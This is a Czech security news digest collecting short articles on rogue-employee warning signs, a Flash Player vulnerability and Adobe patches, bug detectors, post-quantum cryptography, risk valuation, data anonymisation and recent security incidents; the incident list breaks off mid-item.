27.7.2016 Zdroj: ComputerWorld Hrozby
Důvěra a IT jdou ruku v ruce. Zde jsou varovná znamení, kterých je potřebné si všímat, abyste se u některých zaměstnanců nespálili.
Přes všechny důrazy na nástroje a pomůcky se IT stále velmi týká lidí, kteří tyto nástroje a pomůcky vyvíjejí a používají. Spolupráce, vzájemný respekt a nadšení pro práci – to vše a také mnohem více je nezbytné k získání užitečných výsledků bez ohledu na to, zda váš tým IT dodává kód, opravuje chyby, pracuje s firemními uživateli nebo zabezpečuje systémy společnosti.
Jak se technologie stávají silnějšími a počítačové systémy jsou stále více zaplněné citlivými údaji, dostává se jeden lidský aspekt IT pod podrobnější kontrolu: Důvěra.
Během posledních třiceti let se mi povedlo získat úžasné zaměstnance. Lidé, u kterých mi intuice napověděla, že jde o správné kandidáty na pracovní pozici, prokázali své kvality nad má nejdivočejší očekávání.
Občas jsem však opominul včasná varovná znamení, že jinak skvělý kandidát či talentovaný a tvrdě pracující zaměstnanec postrádá, řekněme, silný morální kompas.
Když někdo, koho jste obdivovali, důvěřovali mu a věnovali se mu, se nakonec zachová vůči firmě jako darebák, nelegálně vniká do soukromé korespondence nebo používá údaje kreditní karty zákazníka na nákup počítačového vybavení pro svůj domov, začne vás nesprávně udělená důvěra v tuto osobu pronásledovat.
Pravdou je, že nelze vždy říci, kdo má potenciál stát se lumpem. Během své kariéry jsem však našel několik varovných příznaků, kterých je dobré si všímat. Žádný z nich není spolehlivý a je vždy dobré, aby lidé využívali výhodu pochybnosti.
Považujte tedy následující příznaky spíše za určitou formu nedokonalého lakmusového papírku než za těžce získané lekce vztahů se zaměstnanci, kteří se začali chovat jako darebáci.
Varovný příznak č. 1: Nečekaný nezdar při ověřování minulosti
Jedním z nejlepších zaměstnanců, které jsem za posledních třicet let získal, byla žena, která mi řekla, že jako náctiletá udělala hroznou chybu. Byla součástí skupiny pracovníků na námořní základně ve středisku, kde byl odhalen podvod s fiktivními výplatami finančních náhrad. Byla stíhána u soudu a tento podvodný čin skončil trvalým záznamem v jejím trestním rejstříku.
Během mého rozhovoru s ní byla o tomto incidentu velmi upřímná a vypadala velmi zkroušeně. Ujistila mě, že se něco takového už nestane. Při kontrole její minulosti jsem zjistil, že to byl jediný problém, který kdy měla. Dokonce ani nedostala žádnou pokutu za překročení rychlosti.
Najal jsem ji tedy a o deset let později podává špičkové výkony. Nyní pracuje jako manažerka. Její zaměstnanci ji milují a ona nás nikdy nezklamala. Možná že není divu, že také byla jednou z mých nejlepších spolupracovníků při odhalování nepoctivých pracovníků.
Je to neocenitelná dovednost. Je to také důkaz, že by žádná společnost či zaměstnavatel neměli automaticky diskvalifikovat z přijímacího procesu někoho, kdo je schopen prokázat, že už nemá nic společného se svým dřívějším špatným chováním.
Naproti tomu mi několik dalších potenciálních zaměstnanců neřeklo nic o svých záznamech v trestním rejstříku a namísto toho čekali, až povinná kontrola trestní minulosti odhalí jejich konflikt se zákonem.
Tato forma lži opomenutím se pro mě stala důvodem k odmítnutí. Obvykle v době, kdy ke kontrole minulosti dochází, už daná osoba je u nás zaměstnaná a pracuje v dočasné roli. Je to docela šok zjistit, že někdo, komu jste věnovali svůj čas a důvěru, k vám nebyl upřímný.
Ano, mnozí lidé váhají odhalit své trestní přestupky z minulosti, ale důvěra je hned od počátku zcela zásadní nutností.
Byla to těžce získaná zkušenost. Jeden zaměstnanec, kterého jsme si ponechali i po zjištění problémů s jeho minulostí, nakonec ukradl počítačové vybavení naší společnosti za tisíce dolarů.
Zjistil jsem to, když mě požádal, abych se u něj doma zastavil na diagnostiku případného malwaru v jeho domácím počítači. Když jsem vstoupil do jeho domu, uviděl jsem, že má počítačový rack za několik tisíc dolarů a síťové vybavení stejné, jako jsme měli v práci.
Když si uvědomil, že jsem vybavení poznal, jeho výraz byl jasný. Byla chyba mě zvát domů, minimálně aniž nejprve zakryl ukradené vybavení.
Snažil se mě přesvědčit, že to bylo vyřazené vybavení, které účetní oddělení již odepsalo, a že měl ústní souhlas předchozího šéfa, aby si vzal vybavení domů pro účely odborné přípravy. Rychlý telefonát a kontrola viditelných firemních sériových čísel prokázaly, že šlo o aktivní vybavení naší společnosti. Naštěstí většina zločinců není příliš inteligentní.
Varovný příznak č. 2: Říká, že mu minulí zaměstnavatelé nevěřili
Následující rčení mi v životě pomáhá: „Pokud jste vždy oběť, jste pravděpodobně problémem vy sami.“ Mnoho zaměstnanců, ne-li většina, mělo špatné zkušenosti s jedním nebo několika předchozími zaměstnavateli.
Často je to důvod, proč odešli. Pokud si však pracovník stěžuje na všechny své minulé zaměstnavatele, je téměř jisté, že se na tento seznam dostanete i vy, a to i za sebemenší problém.
Zde je varovným příznakem, že jim minulí zaměstnavatelé nevěřili – zejména když poté popisují situace s deficitem či úplnou absencí zdravého rozumu. Vzpomínám si na jednoho pracovníka, který si stěžoval, že se jeho starému zaměstnavateli nelíbilo, že se díval na soubory s výplatními páskami manažerů.
Udělal jsem malou kontrolu a zjistil jsem, že přistupoval ke všem druhům dat, u kterých k tomu neměl dobrý důvod. Jsem si jistý, že si mě přidal na svůj seznam.
Varovný příznak č. 3: Říká, že dokáže vniknout do systémů kolegů či firmy
Většina zaměstnanců, kteří vnikají do záležitostí svých kolegů, svým kolegům říká, že to dokážou udělat nebo že mohou proniknout do podnikových systémů. Je to divné, ale často je to pravda.
Pokud nespokojený pracovník mluví o tom, co by mohl udělat, kdyby chtěl, považujte to za varování. Ve většině případů nikdo nevypráví vedení o hrozbě, aniž o tom nijak nepřemýšlí, a pokud ano, vedení to nevezme na vědomí.
Ponaučení: Hovory o takových záležitostech by měly být dostatečné k přijetí opatření. Zaprvé – vzdělávejte své zaměstnance, aby tyto pasivně-agresivní hrozby hlásili. Když jsou ohlášené, berte je vážně.
Zajistěte, aby si nadřízený promluvil s pracovníkem za přítomnosti zástupce personálního oddělení, a zkontrolujte, zda pevné disky dotyčného zaměstnance neobsahují hackovací nástroje a důkazy neoprávněného přístupu.
To vše platí i pro zaměstnance přistižené s nedovolenými hackovacími nástroji (pokud ovšem nejsou potřeba pro jejich práci). To samé platí pro zaměstnance, kteří vlastní sbírky hesel jiných uživatelů (pokud není uchovávání těchto hesel součástí jejich pracovní činnosti).
Jestliže se během vyšetřování zjistí, že zaměstnanci vykonávali aktivní neoprávněné hackování, měli by být varováni, že se takové chování netoleruje a že může vyústit v jejich okamžité propuštění. Aktivity těchto zaměstnanců byste měli určitou dobu intenzivně sledovat.
Možná si myslíte, že jsem příliš tvrdý, ale desítky let zkušeností mě naučily potlačovat tyto hrozby již v zárodku. Přistihl jsem pár zaměstnanců s daty, která by mít neměli, a věřím, že dostatečně seriózní přístup k takové události může pomoci připomenout nevinným pracovníkům, aby se neodchylovali od toho, co je správné, a vyhnuli se problémům.
Varovný příznak č. 4: Přepíná obrazovku svého počítače, tabletu či mobilu, když jdete kolem
Tento scénář nastává často: Zastavíte se u kóje a vidíte spolupracovníka, jak rychle přejde na novou obrazovku. Je více než pravděpodobné, že se snaží zakrýt skutečnost, že se právě ulívá a nepracuje na firemních záležitostech.
Když však vidíte, jak přepíná obrazovky, i když očividně pracuje na podnikových záležitostech, je to velké varování. Všechny webové stránky a databáze, na kterých takoví lidé pracují, by neměly být před vedoucím týmu tajné.
Pokud se to stane více než párkrát, zajistěte důkladnou kontrolu.
Varovný příznak č. 5: Nikdy si nebere dovolenou
Staré účetní moudro radí být opatrný na zaměstnance, kteří si nikdy neberou dovolenou. Protože musejí stále zahlazovat stopy, aby je nikdo nechytil, nemohou si vzít ani den volna. To je jeden z důvodů, proč mnoho firem své pracovníky nutí, aby si brali dovolenou.
Flash Player opět terčem útoků, Adobe varuje před kritickým zneužitím
27.7.2016 Zdroj: ComputerWorld Zranitelnosti
Adobe Systems momentálně řeší kritickou zranitelnost ve Flash Playeru, kterou se již hackerům podařilo zneužít. Mezitím firma vydala opravy pro další zasažené aplikace, kterými jsou Reader, Acrobat a ColdFusion, na záplatě pro Flash Player se ale ještě pracuje.
Chyba je zaznamenaná jako CVE-2016.4117 a týká se verzí Flash Playeru 2.0.0.226 a starších pro Windows, OS X, Linux a Chrome OS. Úspěšné zneužití chyby umožňuje útočníkovi převzít vládu nad systémem.
„Adobe si je vědomo zpráv, že hack na CVE-2016-4117 existuje,“ píše společnost v článku zveřejněném v úterý. „Adobe tuto zranitelnost opraví v naší každoměsíční bezpečnostní aktualizaci, náplánované na 12. květen.“
V úterý také firma vydala balíček aktualizací pro Reader a Acrobat, které dohromady opraví 92 chyb. Většina z nich je hodnocená jako kritická.
Zranitelné verze zahrnují Acrobat DC a Reader DC 15.010.20060 a starší, 15.006.30121 a starší, a také Acrobat XI a Reader XI 11.0.15 a starší. Uživatelé si mohou produkt aktualizovat ručně kliknutím na „pomoc“ a následně „zkontrolovat dostupnost aktualizací“ v české verzi.
Firma také vydala aktualizace pro svůj ColdFusion aplikační server. Tyto aktualizace cílí na zranitelnost s ověřením validity vstupu, která mohla vést k mezistránkovým scripting útokům, na problém s ověřením host name, který způsoboval problém u wild card certifikátů, a na Java deserializační chybu v knihovně Apache Commons Collections.
Adobe radí uživatelům nainstalovat ColdFusion (verzi z roku 2016) Update 1, ColdFusion 11 Update 8 nebo ColdFusion 10 Update 19, podle toho, kterou vezi aplikace mají.
Instalace ColdFusion bývají cílem útočníků. V roce 2013 výzkumníci zjistili větší útok, kde hackeři zneužili zranitelností v ColdFusion a nainstalovali díky nim malware na IIS servery Microsoftu.
Kaspersky Lab dokáže nově zabezpečit i průmyslové systémy
12.05.2016 Zdroj: ComputerWorld Zabezpečení
Specializované bezpečnostní řešení pro ochranu kritické infrastruktury a zabezpečení průmyslových podniků představila včera v Praze firma Kaspersky Lab. KICS (Kaspersky Industrial CyberSecurity) podle tvůrců přináší jednotný přístup k IT bezpečnosti pro průmyslové podniky. Novinka přitom zabezpečuje ICS/SCADA servery, HMI panely a inženýrské pracovní stanice, PLC, aniž by nějak ovlivnilo plynulost a konzistenci provozu.
KICS je ve své podstatě kombinací běžných bezpečnostních technologií přizpůsobených pro potřeby průmyslových podniků. Obsahuje ochranu proti malwaru, whitelisting a funkci pro odhalování zranitelností.
To je ale rozšířené o technologie, které jsou speciálně navržené přímo pro průmyslová prostředí – jde o kontrolu integrity PLC programů (Integrity check for PLC programs), sémantický monitoring kontroly příkazů (Semantic monitoring of proces control commands) či telemetrická data (Telemetry data), která dokážou odhalit kybernetické útoky cílící na fyzické části infrastruktury.
Speciální režim Observability Mode se pak soustředí na odhalení kybernetických útoků, chyby provozního personálu a anomálie uvnitř průmyslové sítě. Centrální řídící panel pak umožňuje administrovat veškeré bezpečnostní prvky firmy Kaspersky Lab – tedy od antivirů až pro sofistikované systémy pro SCADA.
Řešení lze prý implementovat i do už existující ICS sítě a technologického procesu dané organizace.
Dodavatel navíc ke KICS poskytuje celou řadu doprovodných služeb včetně kyberbezpečnostních školení (cybersecurity training) pro IT profesionály či vzdělávacích programů pro běžné zaměstnance nebo penetrační testování (Cyber Security and Penetration Testing).
Další služba -- Incident Response -- podle jejích dodavatelů pomáhá lokalizovat narušení sítě, zmírnit následky, zamezit útočníkům hlouběji proniknout do infrastruktury, předcházet dalším útokům a rozvíjet krizový plán do budoucnosti.
Vyhledávání odposlechů
27.7.2016 Zdroj: ComputerWorld Ochrany
Miniaturizace elektronického zařízení má za cíl zvýšení pohodlí užívání. Dává to také široké možnosti k narušení soukromí pomocí odposlechů a minikamer malých rozměrů, které lze snadno ukrýt v místnostech nebo zakamuflovat v předmětech každodenní potřeby.
Mnoho situací vyžadujeochranu důvěrných informací, utajení údajů obchodních partnerů, diskrétnost vedených obchodních rozhovorů, na kterých závisí finanční bezpečí firmy. Nekalá konkurence je schopná zajít velmi daleko, aby ukradla důležité údaje. Instalují skryté kamery, odposlouchávají pomocí štěnic a jiných zařízení dostupných na trhu, které jsou pouhým okem neodhalitelné. Využívání služeb firem odhalujících odposlechy je velmi nákladné a nedá se vždy provést tak, aby nevzbudilo podezření spolupracovníků. Proto se vyplatí investovat do zařízení, které umožní ochránit firemní prostory před špionáží a v případě štěnic nebo mikrokamer umožní lokalizovat a zneškodnit je.
Detektory odposlechu se hodí také ve velmi soukromých situacích, kdy se veřejně známá osoba chce zabezpečit před odposlechem ze strany nepovolaných osob a únikem intimního obsahu do médií
Detektory odposlechu a skrytých kamer jsou vynikajícími zařízeními k zabezpečení svého soukromí a vždy, když máme podezření, že kdosi zasahuje do našich životů bez našeho vědomí.
Detektory odposlechu
Rádiovou štěnici je možné koupit na internetu již za několik stovek korun. Je možné je instalovat jak v kancelářích, tak v bytech nebo ve vozidlech. Kamuflování odposlechů v předmětech každodenní potřeby či v nich použité moderní technologie umožňují monitoring trvající i několik týdnů diskrétním způsobem nevzbuzujícím žádné podezření. Na trhu jsou dostupné také odposlechy GSM. Díky technologii globálního spojení je možné v kterékoliv chvíli zavolat z jakéhokoliv místa na světě na SIM kartu ukrytou např. v dálkovém napájení nebo v napájecí liště a diskrétním způsobem odposlouchávat okolí.
Vyhledávání odposlechů Spy Shop
Vyhledávání odposlechů je stejně oblíbené, jako samotné odposlouchávání. Zároveň s rozvojem odposlechových technik se rozvíjejí i způsoby jejich odhalování. V současnosti se na trhu nachází celá řada zařízení, které umožňují odhalovat odposlechy.
Nejčastějším řešením jsou skenery frekvence - moderní detektory spolupracující s měřiči jejich intenzity. Takováto kombinace umožňuje zachytit signál odposlechu a zaměřit jeho zdroj. V okolí, kde se nachází celá řada vysílačů signálů, je základem odhalení odposlouchávacího zařízení připojení se k přenosu a jeho odposlouchávání.
Pouze pokročilé skenery signálů a měřiče jejich síly s vysokou úrovní přesnosti se v houštině přenosů osvědčí.
Detektory skrytých kamer
Současné skryté kamery mají rozměry menší než zapalovač a jejich objektivy se šířkou počítanou v milimetrech umožňují nahrávat obraz v kvalitě i Full HD. Skryté kamery v předmětech každodenní potřeby slouží k diskrétnímu nahrávání a získání cenných informací. Miniaturní kamery s GSM modulem nebo IP kamery umožňují vzdálené monitorování místnosti pomocí mobilního telefonu nebo počítače. Takováto zařízení jsou prakticky neviditelné pouhým okem a stávají se potencionálním rizikem úniku cenných informací jak soukromých, tak firemních.
Spolu s rozvojem technik špionáže se rozvinuly také metody kontrašpionáže. Objevila se specializovaná zařízení k vyhledávání skrytých kamer. Současná technika je schopna odhalit jak drátové tak i bezdrátové kamery, zapnuté nebo ne. Dostupná v rozumných cenách a legální umožňuje dokonce i malým firmám chránit se před následky úniku informací.
Klasické šifrování už nestačí, kvantové počítače jej rozcupují
27.7.2016 Šifrování
Není tajemstvím, že mnoho z dnes užívaných metod šifrování by ve světě s kvantovými počítači, jejichž masovější nasazení se blíží, bylo zcela nepoužitelných. NIST, respektovaná organizace z oblasti standardů a technologií, hledá, jak z tohoto problému ven.
Právě NIST (National Institute of Standards and Technology) nedávno vydal zprávu, jejímž hlavním tématem byly šifrovací standardy v kvantovém světě. Zpráva naznačuje možnou dlouhodobou strategii, která by se problému vyhnula ještě předtím, než vůbec nastane.
„V poslední době šlo na kvantové počítače mnoho prostředků určených pro výzkum, a každý, od velkých počítačových společností přes vlády, chtějí, aby jejich šifrovací alhoritmy byly, jak my říkáme, ‘kvantově odolné,‘“ vysvětluje matematik NISTu Dustin Moody. „Takže až někdo postaví první kvantový počítač velkého rozsahu, chceme už mít k dispozici algoritmy, které se neprolomí.“
Současná kryptografie se často spoléhá na techniku matematického rozkladu velkých čísel k zajištění bezpečnosti, ale vědci z MIT a rakouské Univerzity Innsbruck nedávno představili, čemu říkají první pětiatomový kvantový počítač, schopný takové šifrovací metody prolomit.
Zatímco tradiční počítače operují s jedničkami a nulami, kvantové počítače se spoléhají na kvantové bity, tzv. „qubity,“ které mohou být zároveň 0 i 1 – tedy ve stavu, kterému říkáme superpozice. A superpozice slibuje obrovskou efektivitu a navýšení výkonu oproti současným počítačům.
Jedno z doporučení ve zprávě NISTu hovoří o tom, že společnosti by se měly soustředit na „kryptografickou obratnost,“ tedy schopnost rychle přejít na jiný druh šifrování -- takový, který bude bezpečnější. Vytvořit tyto bezpečné algoritmy je pak dlouhodobým cílem.
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »
Za účelem dosažení tohoto cíle se vypíše soutěž, v níž členové veřejnosti navrhnou a otestují slibné nové šifrovací metody. Podobná soutěž se přitom už dříve osvědčila – vedla např. k vývoji SHA-3 hashovacích funkcí, používaných pro autentizaci digitálních zpráv. NIST plánuje zahájit novou soutěž během několika málo měsíců.
„Bude to dlouhý proces zahrnující veřejné prověřování algoritmů, odolných vůči kvantové technologii,“ říká Moody. „A nečekáme, že najdeme jen jednoho vítěze.“
Hned několik z dnes běžně fungujících bezpečnostních mechanismů by mohlo být prolomeno kvantovým počítačem, a to např. veřejné šifrovací klíče nebo digitální podpisy, takže bude třeba vytvořit vícero nových alternativ.
Ačkoli jsou kvantové počítače a s nimi související bezpečnostní hrozba ještě vzdálená budoucnost, NIST nehodlá ztrácet čas.
„Historicky trvalo dlouho, než se rozhodlo, že je šifrovací systém dobrý, a než jsme ho zařadili jako standard do produktů na trhu – může to trvat 10 i 20 let,“ pokračuje Moody. „Společnosti začaly reagovat na nové změny, a my cítíme, že je čas začít na tom pracovat.“
Vyčíslete si finanční hodnotu IT rizik
27.7.2016 Rizika
Manažeři zabezpečení běžně musejí dělat těžká rozhodnutí o tom, jaká rizika snižovat, jaká zcela eliminovat nebo převést a konečně která jen akceptovat. I rozpočet na zabezpečení má totiž své meze.
Přijímání rozhodnutí ohledně rizik vyžaduje důkladné chápání dopadu těchto opatření, znalost dostupných ochran a někdy také odvahu učinit těžké rozhodnutí. Cílem tohoto článku je poskytnout rady, které by bezpečnostním manažerům mohly pomoci při tomto obtížném rozhodování o rizicích.
Stanovte dopady
Pokud způsob stanovení rizika není v souladu se samotným podnikáním vaší firmy, potom na tom bude metoda, jak se rizika ošetří, obdobně. Jestliže stále určujete riziko podle staré kvalitativní stupnice „nízké, střední, vysoké“, jak potom můžete posoudit, zda konečné rozhodnutí odpovídají potřebám vaší firmy?
Jak popíšete nejvyššímu vedení nebo členům představenstva, jaký dopad mohou mít příslušná rizika na firmu, a jak odůvodníte investice potřebné pro zabezpečení, abyste je přesvědčili o přínosu přijetí opatření?
Když dostanete od vedení otázku na návratnost investic (ROI) do zabezpečení, jak na ni odpovíte?
Chcete-li se vyzbrojit odpověďmi na tyto otázky, musíte nejprve správně stanovit dopad, jaký by mělo dané riziko na vaši firmu. A chcete-li pochopit dopad, budete muset vědět, jaká aktiva příslušná hrozba postihne (v případě, že událost skutečně nastane), jak rozsáhlé postižení bude a jaká bude souhrnná obchodní hodnota zasažených aktiv.
Při výpočtu hodnoty pro firmu je důležité zvážit informační aktiva stejně jako aktiva infrastruktury. Hodnota vašich informačních aktiv ale nemusí být tak zřejmá jako u aktiv infrastruktury.
Nedávná zpráva společnosti Forrester Research to částečně vysvětluje slovy: „...hodnota informací je procento současného a budoucího obratu, které tyto informace vytvoří, minus přímé a nepřímé náklady na tvorbu, správu a jejich ochranu.“
Pokud se dané riziko stane skutečností, bude dopad na vaši firmu kombinací nákladů spojených s událostí samotnou plus ztracený obrat v důsledku nedostupnosti takových aktiv.
Ponemon Institute nabízí několik užitečných průvodců jako například náklady na vyzrazení osobních dat (například citlivé osobní údaje) podle záznamů. Využijte tyto průvodce, ale vypočítejte také obrat, který vaše firma ztratí v případě nedostupnosti zasažených aktiv.
Při vyjadřování hodnoty v souvislosti s rizikem tuto hodnotu vyčíslete v penězích. Když to uděláte, budete moci porovnat obchodní hodnotu s finančním vyjádřením rizika pomocí stejného měřítka.
To je podstata vyčíslení finanční hodnoty rizika. Vyjádření finanční hodnoty rizik tímto způsobem umožní přizpůsobit bezpečnostní program podnikovým cílům.
Firmy existují proto, aby vydělávaly peníze, takže vyčíslení hodnoty rizik v podobě peněz vám pomůže poměřovat je podle jejich dopadu na vši organizaci.
Nejvyšší vedení chápe ekonomické aspekty mnohem lépe než bezpečnostní rizika. Když mu vysvětlíte své důvody pro zmírnění (či nezmírnění) daného rizika, bude schopné udělat informovanější rozhodnutí, protože to bude v kontextu, kterému rozumí.
Vyjádření finanční hodnoty klíčových rizik
Proces vyjádření finanční hodnoty rizika vyžaduje důkladné pochopení, a to asi nebudete chtít dělat pro každý existující systém a síťové bezpečnostní riziko. Místo toho se zaměřte jen na vyčíslení finanční hodnoty rizik s nejvyšší hodnotou, jako jsou hrozby, které by mohly zasáhnout kritická podniková aktiva a například ovlivnit produktivitu firmy.
K určení peněžní hodnoty rizika je nutné pochopit pravděpodobnost výskytu rizika a také dopad na vaši firmu.
Při určování pravděpodobnosti se zaměřte na konkrétní opatření, která vaše organizace používá ke snížení dopadů daného rizika, versus opatření, jež považujete za potřebné zavést ke zmírnění této hrozby.
Vytvořením poměru již zavedených opatření a opatření, která je třeba ke zmírnění rizika zavést, se blížíme k vyjádření pravděpodobnosti výskytu.
Je ale důležité si uvědomit, že se zaměřujeme jen na konkrétní opatření, která řeší dané riziko (rozhodně nemáme na mysli všechna opatření v rámci vaší organizace). V různých situacích mohou být některá opatření cennější než jiná, takže přiřazujte každému z nich váhu podle zvažovaného scénáře.
Když toto cvičení pak budete později dělat s cílem vyčíslit finanční hodnotu dalších rizik, uvědomte si, že se jak příslušná opatření, tak i jejich odpovídající váhy mohou změnit.
Řekněme, že rizikem, u kterého vyčíslujete hodnotu, je „ochrana před únikem dat“ z vašeho podnikového systému ERP (v tomto příkladu tedy kritická podniková aplikace). Našli jste například devět konkrétních opatření, u kterých se domníváte, že uspokojivě řeší riziko úniku dat.
Každému z nich přiřadíte váhu 1–10 (10 označuje nejvyšší hodnotu). Při hodnocení opatření určíte, které z nich už používáte a které nikoliv (viz tabulku 1).
Tabulka 1: Opatření pro zamezení úniku dat z ERP
---
Použitelná opatření potřebná pro riziko
Váha
Použito?
Segregace odpovědností
8
Ano
Minimalizace oprávnění
10
Ano
Šifrování databází
8
Ne
Protokolování a analýza událostí zabezpečení
8
Ne
Bezpečnostní zásady a postupy
7
Ano
Prevence úniků dat (DLP)
10
Ano
Firewall
8
Ano
Dvoufaktorová autentizace
10
Ne
Šifrovaný vzdálený přístup
10
Ano
CELKEM
79
53 (79–26)
Zachování anonymity? S big daty spíše zbožné přání
27.7.2016 Zabezpečení
Pro zachování anonymity osobních informací při shromažďování big dat existují účinné metody. Záleží však z velké míry na tom, jak často se využívají. A většina expertů uvádí, že to není moc často.
Jak anonymní může člověk v dnešním digitálním světě být? Nejde o skupiny hacktivistů, ale o anonymitu průměrných lidí v situaci, kdy se jimi vytvářená data shromažďují v podstatě každým – počínaje marketingem, webovými stránkami, výzkumnými pracovníky, vládními organizacemi atd.
Je shromažďování údajů pro potřeby big dat – i s odstraněním osobních údajů či zašifrováním – stále zranitelné vůči metodám zpětného ztotožnění, které identifikuje jednotlivce až do té míry, že je možné nebo už probíhá vlezlé narušování soukromí?
Nebo lze zachovat jednotlivcům bezproblematickou anonymitu v moři dat, která se používají ke zjišťování trendů, sledování šíření nemoci, určování oblastí s vysokou kriminalitou nebo k dalším záležitostem, jež zlepší hospodářský blahobyt či zdraví populace?
Je anonymita zajištěná?
Nečekejte od zástupců IT a odborníků na soukromí jednomyslnou odpověď. V této oblasti stále probíhají diskuze. Skupina na jedné straně zahrnuje autory dokumentu „Big data a inovace, náprava záznamů: deidentifikace funguje“ z června 2014, kde se uvádí, že soukromí je dostatečně podporované a média by měla přestat přehánět.
Její autoři Daniel Castro a Ann Cavoukian kritizují „zavádějící titulky a výroky v médiích“, které naznačují, že osoby s pouze průměrnými znalostmi a správnými technologickými nástroji dokážou odhalit totožnost osob, jejichž data se anonymizovala.
Chyba způsobující šíření tohoto mýtu je podle nich nikoli v samotných zjištěních prezentovaných výzkumníky v základní literatuře, ale „tendence komentátorů této literatury zveličovat publikovaná zjištění“.
Tvrdí, že správně udělaná anonymizace je prakticky neprůstřelná a snižuje riziko identifikace osob na méně než 1 %, což je méně než riziko narušení soukromí při dolování soukromých informací z vynášeného odpadu, který může obsahovat citlivé osobní informace.
Také argumentují, že neopodstatněný strach ze ztráty anonymity může podkopat „pokrok v oblasti analýz dat, které otevírají možnosti použití anonymizovaných datových souborů způsoby, jež nikdy dříve nebyly možné – třeba pro vytváření značných sociálních a ekonomických přínosů“.
Uznávají však, že aby byl proces anonymizace účinný, nesmí je uskutečňovat povrchním způsobem. A to je podle Pam Dixonové, výkonné ředitelky světového fóra pro soukromí (World Privacy Forum), skutečný problém. Ona a další tvrdí, že mimo kontrolované prostředí akademického výzkumu anonymita a soukromí v podstatě přestaly existovat.
Nedostatky soukromí
Dixonová neoponuje tvrzením o dosažitelné účinnosti ze zmíněného dokumentu, ale upozorňuje, že v reálném světě nedochází k důsledné anonymizaci všech množin dat.
„Ve skutečnosti to lidé nebudou dělat důsledně,“ tvrdí Dixonová a dodává. „Chcete-li získat skutečnou anonymitu při zpracování big dat, musíte použít mimořádně širokou úroveň agregace.“
Pokud se podle ní bavíme jen o údajích shromážděných pro celostátní či lokální trendy, potom lze anonymizace dosáhnout, protože nejde o samotné jednotlivce. Jestliže se však mluví o počtu osob s chřipkou v Praze a jsou k dispozici všechna poštovní směrovací čísla, je to už něco jiného.
Joseph Lorenzo Hall, hlavní technolog Centra pro demokracii a technologie (CDT, Center for Democracy & Technology), souhlasí, že ačkoli důsledná anonymizace je demonstrativně účinná, ve světě sběru dat tento ideální stav nevzniká. Jednou z příčin podle něj je, že skutečně neprůstřelná anonymizace snižuje užitečnost údajů.
„Podstatnou vlastností těchto souborů dat, které umožňují opětovnou identifikaci, je, že záznamy chování téhož jedince jsou vzájemně propojené. To je velká část přínosu uchovávání těchto záznamů,“ uvádí Hall.
Velkým problémem je podle něj zveřejňování souborů dat, které byly špatně anonymizované, a také sdílení údajů, u nichž se předpokládá nepřítomnost osobních informací, ale ve skutečnosti obsahují nějaký druh trvalého identifikátoru, který lze triviálně přiřadit k odpovídajícím osobám.
Zatímco některé shromažďování dat skutečně směřuje k ekonomickému prospěchu či zdraví obyvatelstva, Hall poznamenává, že v mnoha případech tomu tak není. „Některé maloobchody používají sledování Wi-Fi, v rámci něhož se využívá MAC adresa vašeho přístroje (trvalý síťový identifikátor), aby vás ve svém obchodě pečlivěji sledovali. To je důvod, proč Apple začal tyto adresy ‚randomizovat‘.“
Paul O‘Neil, konzultant pro zabezpečení informací ve společnosti IDT911 Consulting, má téměř totožný názor. „Pokud se anonymizace udělá dobře, potom to skutečně může fungovat. To slovo ‚pokud‘ je však mnohem významnější podmínka, než si většina lidí uvědomuje.“
Co má být anonymní?
Raul Ortega, manažer společnosti Protegrity, upozorňuje také na to, jak nevyrovnaná je ochrana soukromých dat. „Zatímco se zabezpečení kreditních karet zlepšuje, v oblasti anonymizace hromady citlivých osobních údajů, které existují v každé firmě, se toho dělá jen velmi málo.“
Částí tohoto problému může být podle právních expertů určitý aspekt sémantiky, který vede k obecnému zmatku. „Musíme mít jasno v tom, co máme na mysli, když prohlašujeme data za anonymní,“ upozorňuje Kelsey Finchová, poradkyně fóra pro budoucnost soukromí (FPF, Future of Privacy Forum).
Netflix blokuje IPv6 tunely kvůli geolokaci
27.7.2016 Zdroj:Root.cz Zabezpečení
Netflix je nucen kvůli správcům autorských práv dohlížet na geolokaci uživatelů a určitý obsah nabízet jen v některých zemích. Dříve bylo možné to obejít pomocí VPN, ale firma od začátku letošního roku začala blokovat přístup ze známých VPN. Čtěte: Netflix už nedovolí obejít omezení pomocí VPN
Nyní populární streamovací služba začala blokovat řadu IPv6 tunelů. Uživatelé využívající tunely Hurricane Electric jsou zablokovaní úplně, ale problémy hlásí i uživatelé dalších poskytovatelů s nativní IPv6 konektivitou. Navíc zákaznická podpora doporučuje uživatelům úplně vypnout podporu IPv6 na svých počítačích. Přestože internet směřuje k IPv6, správci obsahu tlačí Netflix opačným směrem.
Podobným problémem netrpí jen Netflix, ale také český Stream.cz má s tunely od HE problém. Některé zahraniční pořady odmítne přehrát, protože IPv6 adresy jsou přidělovány z rozsahu 2001:470::/32, který je podle WHOIS přidělen ARIN do USA.
Belgie vede žebříček států v kybernetické napadnutelnosti
27.7.2016 Zdroj:Root.cz Hrozby
Belgie překvapivě vede žebříček států v kybernetické napadnutelnosti. Následuje Tádžikistán, Samoa a Austrálie. Žebříček byl zpracován bezpečnostní firmou Rapid7 a v podstatě odráží jen počet otevřených portů na veřejných IP adresách.
Nás může těšit, že Česká republika je až na 34. místě, za například USA na 14. místě nebo UK na 23.
TOP-10 bezpečnostních incidentů v květnu 2016
27.7.2016 Zdroj:Root.cz Incidenty
Minulý měsíc se stalo mnoho zajímavých událostí a bylo velmi těžké vybrat jen 10 z nich. Přesto se nám to podařilo a tady je naše hodnocení TOP-10 bezpečnostních incidentů.
Výběr z bankomatů v Japonsku
Dne 15. května se skupina dobře organizovaných zločinců (známých jako „kapky“ v cardingovém slangu)inkasovala 1,4 miliardy jenů (asi 12 milionů EUR) z bankomatů v 16 městech. Celá operace byla velmi dobře organizovaná, trvalo to jen 2,5 hodiny a účastnilo se jí více než 100 lidí. Jedná se o největší výběrový podvod od roku 2012.
InvestBank UAE narušení
Hackeři publikovali archiv 10Gb, který obsahuje interní soubory, citlivé finanční dokumenty a okolo 100 tisíc čísel kreditních karet od roku 2011 až do září 2015.
Útok na turecké státní nemocnice
17. května hackeři zveřejnili video na YouTube prohlašující proniknutí do tureckých státních nemocnic.Odhalili obrovskou databázi obsahující osobní údaje lidí s diagnózou HIV a žen, které byly na potratu. Podle oficiálních zpráv z vyšetřování, bylo útokem ovlivněno celkem 33 nemocnic.
Únik dat švýcarského RUAG
